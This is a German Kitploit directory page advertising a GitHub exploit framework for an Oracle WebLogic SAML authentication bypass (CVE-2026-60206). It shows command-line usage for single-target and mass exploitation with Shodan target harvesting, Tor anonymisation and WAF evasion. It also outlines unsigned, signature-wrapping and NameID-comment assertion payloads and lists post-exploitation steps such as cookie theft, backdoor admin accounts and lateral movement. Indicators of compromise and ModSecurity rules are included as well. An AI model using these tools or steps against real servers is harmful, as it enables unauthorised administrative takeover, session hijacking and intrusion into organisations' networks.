Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-60206-PoC-Exploit — 👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Bash- & Python-Versionen. Funktionen: --detect sichere Prüfung, --exploit combo/unsigned/xsw/nameid/all, --shodan Integration, --tor Unterstützung, Massen-Scanning, JSON/CSV/JSONL-Ausgabe, Cookie-Validierung. 🛡️ CVSS 9.9 Kritisch - Ethisch nutzen, legal bleiben. 🔒 | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-60206-poc-exploit
Authentifizierung & AutorisierungExploit-FrameworksPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationWAF-Umgehung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Penetrationstests
Red Teaming
GitHubtc4dy/cve-2026-60206-poc-exploit

CVE-2026-60206-PoC-Exploit

Repository anzeigen
423vor 1 MonatNoch nicht geprüft

Über

👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Bash- & Python-Versionen. Funktionen: --detect sichere Prüfung, --exploit combo/unsigned/xsw/nameid/all, --shodan Integration, --tor Unterstützung, Massen-Scanning, JSON/CSV/JSONL-Ausgabe, Cookie-Validierung. 🛡️ CVSS 9.9 Kritisch - Ethisch nutzen, legal bleiben. 🔒

Teilen

CVE-2026-60206

CVE-2026-60206 – Oracle WebLogic SAML-Authentifizierungs-Bypass – Exploit-Framework-Toolkit

CVE-2026-60206 CVSS 9.9 CISA KEV Python 3.6+

Pre-Auth Bypass SAML Injection Admin Access Cross-Platform

Oracle WebLogic Server – SAML-Authentifizierungs-Bypass → Admin-Übernahme

Exploit-Framework & Massen-Scanner
Nur für autorisierte Sicherheitstests.


⚖️ Rechtlicher Haftungsausschluss & verantwortungsvolle Nutzung

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.

Die Autoren und Mitwirkenden sind nicht für Missbrauch oder Schäden verantwortlich, die durch diese Software verursacht werden. Die Benutzer sind allein dafür verantwortlich, dass sie vor dem Testen die ausdrückliche schriftliche Genehmigung des Eigentümers des Zielsystems einholen. Unbefugter Zugriff auf Computersysteme ist nach dem Computer Fraud and Abuse Act (CFAA) und ähnlichen Gesetzen weltweit illegal.

Durch die Nutzung dieser Software erklären Sie sich damit einverstanden:

  • Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben.
  • Halten Sie alle geltenden lokalen, staatlichen und bundesrechtlichen Gesetze ein.
  • Verwenden Sie es nicht für böswillige, destruktive oder illegale Aktivitäten.

⚠️ WARNUNG: Diese Schwachstelle wird aktiv in freier Wildbahn ausgenutzt. Unbefugte Nutzung kann zu schwerwiegenden rechtlichen Konsequenzen führen.


[+!] Schwachstellenübersicht

CVE-2026-60206 ist eine kritische Schwachstelle für einen nicht authentifizierten Authentifizierungs-Bypass in der SAML-Implementierung (Security Assertion Markup Language) des Oracle WebLogic Servers. Sie ermöglicht es entfernten Angreifern, die SAML-Authentifizierung zu umgehen und ohne gültige Anmeldedaten administrativen Zugriff auf die WebLogic-Konsole zu erlangen.

So funktioniert es:

  1. SAML-Injection: Die Schwachstelle beruht auf einer mangelhaften Validierung von SAML-Assertions. Angreifer können bösartige SAML-Antworten erstellen, die die Authentifizierungsprüfungen umgehen.

  2. Signatur-Bypass: Die Schwachstelle ermöglicht es, die XML-Signaturvalidierung durch XML-Signature-Wrapping-Angriffe (XSW) zu umgehen, bei denen Angreifer bösartige Assertions mit legitimen Signaturen umhüllen.

  3. NameID-Manipulation: Angreifer können Kommentare injizieren oder das NameID-Feld manipulieren, um sich als privilegierte Benutzer auszugeben.

  4. Admin-Zugriff: Eine erfolgreiche Ausnutzung verschafft dem Angreifer administrativen Zugriff auf die WebLogic-Server-Konsole mit voller Kontrolle.

Wichtige Fakten:


🛠️ Exploit-Framework

Das komplette Multi-Exploit zu Bildungszwecken verkettet mehrere SAML-Angriffsvektoren, um einen Authentifizierungs-Bypass zu erreichen, mit erweiterten Funktionen für Massen-Scanning, Cookie-Diebstahl und administrativen Zugriff.

✨ Funktionen

Angriffsvektoren


🕵️ Sicherer Verifizierer (--detect)

Der sichere Verifizierer führt eine nicht-intrusive Schwachstellenerkennung durch, ohne schädliche Payloads auszuführen oder Systemänderungen vorzunehmen.

✨ Funktionen


📦 Installation & Anforderungen

Voraussetzungen

  • Python 3.6+ oder Bash 3.2+
  • curl (für die Bash-Version)
  • pip (für die Bibliothek requests, Python-Version)

Abhängigkeiten installieren

root@kitploit:~
# Python version
pip install requests urllib3

# Optional: Shodan support
pip install shodan

# Bash version: curl only (no additional dependencies)

[!NOTE] Die Bash-Version funktioniert ausschließlich mit curl und hat keine externen Abhängigkeiten. Die Python-Version benötigt requests und urllib3 (optional: shodan für die Shodan-Integration).


🚀 Anwendungsbeispiele

[1] Python-Exploit-Framework (exploit.py)

root@kitploit:~
# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin

# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v

# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json

# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv

# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit

# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20

# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl

# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json

# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0

# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify

# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v

[2] Bash-Exploit-Framework (exploit.sh)

root@kitploit:~
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin

# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json

# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20

# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json

# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl

# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify

# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json

# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v

[3] Basis-Validator (verifier_poc.sh)

root@kitploit:~
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin

# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt

# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify

# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080

🎯 Betroffene Versionen

⚠️ Wichtig: Diese Schwachstelle betrifft selbst gehostete WebLogic-Server-Bereitstellungen. Wenden Sie die Oracle-CPU Juli 2026 umgehend an.


🧠 Technische Tiefenanalyse

1. SAML-Authentifizierungs-Bypass

Die Schwachstelle ermöglicht es Angreifern, die SAML-Authentifizierung zu umgehen, indem sie bösartige SAML-Antworten erstellen, die von der SAML-Implementierung von WebLogic nicht ordnungsgemäß validiert werden.

Verwundbarer Endpunkt:

root@kitploit:~
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded

SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/

2. Angriffsvektoren

Unsigned-Assertion

saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>

</saml2:Assertion>

XML-Signature-Wrapping (XSW)

ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>

<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>

NameID-Kommentarinjektion

<saml2:NameID Format="...">

lowpriv

</saml2:NameID>

3. Nach der Ausnutzung

Cookie-Diebstahl

Eine erfolgreiche Ausnutzung liefert ein JSESSIONID-Cookie, das administrativen Zugriff auf die WebLogic-Konsole gewährt.

Session-Hijacking

Das gestohlene Cookie kann verwendet werden, um:

  • auf die WebLogic-Administrationskonsole zuzugreifen
  • Anwendungen bereitzustellen/zu entfernen
  • auf JNDI-Ressourcen zuzugreifen
  • beliebige Befehle über JMX auszuführen

Persistenz

  • Bösartige Anwendungen bereitstellen (WAR-Dateien)
  • Backdoor-Admin-Benutzer erstellen
  • Remote-Zugriffstools installieren

Laterale Bewegung

  • Über gestohlene Anmeldedaten auf andere Server im Netzwerk zugreifen
  • Vertrauensbeziehungen zwischen WebLogic und anderen Systemen ausnutzen
  • Zu internen Netzwerken pivotieren

🔍 Kompromittierungsindikatoren (IoCs)

Log-Analyse

Durchsuchen Sie Ihre WebLogic-Logs nach Folgendem:

  • access.log – Anfragen an /saml2/sp/acs, /saml2/acs mit ungewöhnlichen SAML-Parametern
  • domain.log – Authentifizierungs-Bypass-Versuche mit ungültigen SAML-Assertions
  • diagnostic.log – SAML-Parsing-Fehler oder Fehler bei der Signaturvalidierung

Verdächtige Anfragen

  • SAMLResponse-Parameter, die Folgendes enthalten:
    • Mehrere <saml2:Assertion>-Tags
    • Kommentare in <saml2:NameID>-Feldern
    • Nicht signierte Assertions
    • Base64-kodiertes bösartiges XML
    • javascript: oder eval() in Parametern

Dateien

  • Unerwartete Session-Dateien in WebLogic-Temp-Verzeichnissen
  • Modifizierte Konfigurationsdateien (config.xml, jps-config.xml)
  • Neue WAR-Dateien im autodeploy-Verzeichnis
  • Modifizierte weblogic.security-Dateien

Netzwerk

  • Nicht autorisierte administrative Verbindungen zur WebLogic-Konsole
  • Ungewöhnliche Port-Scans, die auf SAML-Endpunkte abzielen
  • Ausgehende Verbindungen vom WebLogic-Server zu unbekannten IPs
  • Reverse-Shell-Verbindungen auf ungewöhnlichen Ports

Prozesse

  • Unerwartete Java-Prozesse
  • Shell-Prozesse, die von WebLogic gestartet wurden
  • Netzwerkverbindungen vom WebLogic-Benutzer zu externen Hosts

🛡️ Eindämmung & Behebung

Sofortmaßnahmen

  1. Oracle-CPU Juli 2026 sofort anwenden
  2. SAML deaktivieren, falls nicht aktiv genutzt
  3. SAML-Endpunkte auf verdächtige Aktivitäten überwachen
  4. Zugriffsprotokolle auf Ausnutzungsversuche prüfen
  5. Alle Anmeldedaten auf betroffenen Systemen rotieren

Langfristige Maßnahmen

  1. WAF-Regeln implementieren, um bösartige SAML-Anfragen zu blockieren
  2. SAML-Signaturvalidierung im strikten Modus aktivieren
  3. Regelmäßige Sicherheitsaudits der WebLogic-Konfigurationen durchführen
  4. Netzwerksegmentierung, um die WebLogic-Exposition zu begrenzen
  5. SIEM-Überwachung für WebLogic-Ereignisse implementieren

WAF-Regeln

root@kitploit:~
# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10001,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Multiple SAML Assertions',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"

# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10002,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - NameID Comments',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"

# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10003,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Unsigned Assertion',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"

📚 Referenzen

  • NVD – CVE-2026-60206
  • Oracle Critical Patch Update Advisory – Juli 2026
  • CISA-KEV-Katalog
  • SecurityFocus – CVE-2026-60206
  • The Hacker News – WebLogic-Zero-Day ausgenutzt

🔗 Weitere Exploits

  • CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
  • CVE-2026-6875 - ServiceNow Pre-Auth RCE Exploit Framework
  • CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
  • CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
  • CVE-2026-41940 - cPanel/WHM Authentication Bypass
Tool herunterladen
AttributWert
📅 EntdecktJuli 2026 (Oracle-CPU)
⚠️ CVSS-Score9.9 (KRITISCH)
📋 CISA KEVHinzugefügt am 21. Juli 2026
🎯 Betroffene ProdukteOracle WebLogic Server (Fusion Middleware)
🔄 Behobene VersionenOracle-CPU Juli 2026
🔓 AuthentifizierungNicht erforderlich (Pre-Auth)
🌍 Aktive AusnutzungIn freier Wildbahn bestätigt (Juli 2026)
FunktionBeschreibung
🚀 Multi-Vektor-Exploit7 Angriffsvektoren: unsigned, xsw_v1-4, nameid, combo
💻 Massen-ScanningGleichzeitiges Scannen mit Thread-Pool (Python) / FIFO (Bash)
🔐 Cookie-DiebstahlEntwendet JSESSIONID für Session-Hijacking
👑 Admin-KonsolenzugriffVollständiger administrativer Zugriff auf die WebLogic-Konsole
📁 VersionserkennungErkennt WebLogic-Versionen und Schwachstellenstatus
🌐 Batch-ScanningMassen-Exploit mehrerer Ziele mit Threading
🎯 Sichere ErkennungOptionales --detect-Flag zur nicht-intrusiven Schwachstellenverifizierung
🧩 Shodan-IntegrationLädt Ziele direkt aus der Shodan-Suche
🔍 Tor-UnterstützungAnonymisiert Scans mit Tor-Proxy
📊 Mehrere AusgabeformateJSON-, CSV-, JSONL-Streaming-Ausgabe
🪟 PlattformübergreifendUnterstützt Linux, macOS, BSD, Alpine, WSL
🔒 Thread-sicherVerwendet Sperrmechanismen für parallele Vorgänge
📋 Automatisches Speichern von SessionsSpeichert erfolgreiche Cookies für die spätere Verwendung
⚙️ WAF-BypassUser-Agent-Rotation und zufällige Verzögerungen
VektorBeschreibung
unsignedNicht authentifizierte SAML-Assertion ohne Signatur
xsw_v1XML-Signature-Wrapping – Mehrere Assertions
xsw_v2XSW – Umgehung der eingebetteten Signatur
xsw_v3XSW – Namespace-Manipulation
xsw_v4XSW – Injektion mehrerer Assertions
nameidNameID-Kommentarinjektion
comboKombinierter Angriff (unsigned + XSW + NameID)
FunktionBeschreibung
🔍 WebLogic-ErkennungIdentifiziert WebLogic-Instanzen über LoginForm.jsp
📊 VersionserkennungErkennt spezifische WebLogic-Versionen und Patch-Level
🧪 SAML-Endpunkt-ErkennungTestet auf SAML-ACS-Endpunkte
🔒 Nicht-intrusivIdentifiziert nur verwundbare Versionen
📋 JSON/CSV-AusgabeExportiert Ergebnisse für Berichte
🔄 Massen-ScanningScannt mehrere Ziele mit Threading-Unterstützung
Oracle-WebLogic-VersionStatus
12.2.1.4.0🔴 VERWUNDBAR
14.1.1.0.0🔴 VERWUNDBAR
14.1.2.0.0🔴 VERWUNDBAR
15.1.1.0.0🔴 VERWUNDBAR
Andere VersionenOracle-CPU Juli 2026 prüfen